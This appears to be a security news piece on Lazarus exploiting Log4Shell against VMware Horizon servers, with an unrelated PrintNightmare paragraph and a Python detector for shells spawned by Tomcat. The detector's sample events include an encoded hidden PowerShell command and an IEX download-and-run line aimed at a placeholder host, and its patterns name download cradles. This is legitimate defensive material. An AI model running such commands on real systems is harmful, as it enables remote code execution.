
North Korean state-sponsored hacking operation Lazarus has been targeting VMware Horizon servers in malware attacks exploiting the Log4Shell remote code execution flaw, tracked as CVE-2021-44228, reports BleepingComputer. Vulnerable VMware Horizon servers have been attacked since last month by Lazarus, which has been abusing Log4Shell via the servers' Apache Tomcat service to facilitate PowerShell command execution and eventual NukeSped backdoor installation, a report from AhnLab's ASEC revealed. Researchers found that the C++-based NukeSped backdoor features screenshot capturing, file accessing, and key press recording capabilities, and has been leveraged by Lazarus for deploying a console-based information-stealer malware. The info-stealer was found to exfiltrate browser-based search histories and account credentials, the names of recently used MS Office and Hancom 2010 files, and email account data from MS Office Outlook, Outlook Express, and Windows Live Mail. The report also showed that in some cases Lazarus used Log4Shell to distribute the Jin Miner cryptominer instead.

According to Sophos, the attackers are using several different approaches to infect targets. While some of the earlier attacks used Cobalt Strike to stage and execute the cryptominer payloads, the largest wave of attacks, which began in mid-January 2022, executed the cryptominer installer script directly from the Apache Tomcat component of the VMware Horizon server.

“Log4J is installed in hundreds of software products and many organizations may be unaware of the vulnerability lurking within their infrastructure, particularly in commercial, open-source or custom software that doesn’t have regular security support. This includes patched versions of VMware Horizon if organizations use the application in their network,” said Gallagher. “Sophos’ findings suggest that multiple adversaries are implementing these attacks, so the most important protective step is to upgrade all devices and applications that include Log4J with the patched version of the software. And while patching is vital, it won’t be enough if attackers have already been able to install a web shell or backdoor in the network. Defense in depth and acting upon any detection of miners and other anomalous activity is critical to avoid falling victim to such attacks.”

PrintNightmare can be exploited by a malicious or compromised authenticated user to execute code at the SYSTEM level on a remote domain controller via the vulnerable Windows Print Spooler service running on that box. Like CVE-2021-1675, PrintNightmare may affect more than just domain controllers.
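The AhnLab finding above, Log4Shell exploitation through the Horizon server's Apache Tomcat service leading to PowerShell execution, gives defenders one concrete behaviour to alert on: a servlet container spawning an OS shell. The Python below is an added example, not code from any of the reports cited here; the process-creation events are constructed in the shape of Sysmon Event ID 1 fields, and ws_TomcatService.exe is assumed to be the Horizon Tomcat service binary.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style); paths, hosts and command
# lines are invented for this example. ws_TomcatService.exe is an assumed Horizon Tomcat name.
SAMPLE_EVENTS = [
    {   # benign: the Tomcat service starting its own Java worker
        "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
        "Image": r"C:\Program Files\VMware\VMware View\Server\jre\bin\java.exe",
        "CommandLine": "java.exe -Dcatalina.base=... org.apache.catalina.startup.Bootstrap start",
    },
    {   # suspicious: Tomcat spawning hidden, encoded PowerShell
        "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc BASE64PLACEHOLDER",
    },
    {   # suspicious: Tomcat spawning cmd.exe that pulls a script from the network
        "ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s.ps1')\"",
    },
    {   # benign: an administrator's interactive PowerShell started from the desktop
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
]

# Servlet-container parents that have no routine reason to launch an OS shell on a Horizon server
WEB_SERVICE_PARENTS = re.compile(r"^(ws_tomcatservice|tomcat\d*|javaw?)\.exe$", re.I)
SHELL_CHILDREN = re.compile(r"^(powershell|pwsh|cmd|wscript|cscript|mshta|certutil|bitsadmin)\.exe$", re.I)
CMDLINE_FLAGS = {  # extra context that raises confidence; the parent/child pair alone already alerts
    "encoded command": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I),
    "hidden window": re.compile(r"(^|\s)-w(indowstyle)?\s+hidden", re.I),
    "download cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "bypass/no-profile": re.compile(r"-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I),
}

def suspicious_web_children(events):
    """Return (event index, reasons) for every shell-like child of a Tomcat/Java parent."""
    hits = []
    for i, ev in enumerate(events):
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1]
        child = ev.get("Image", "").rsplit("\\", 1)[-1]
        if not (WEB_SERVICE_PARENTS.match(parent) and SHELL_CHILDREN.match(child)):
            continue
        reasons = [f"{parent} spawned {child}"]
        reasons += [name for name, rx in CMDLINE_FLAGS.items() if rx.search(ev.get("CommandLine", ""))]
        hits.append((i, reasons))
    return hits
```

Running `suspicious_web_children(SAMPLE_EVENTS)` flags only the two Tomcat-spawned shells; the same parent/child logic ports directly to a SIEM query over real telemetry, with the command-line flags used to rank rather than gate the alert.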
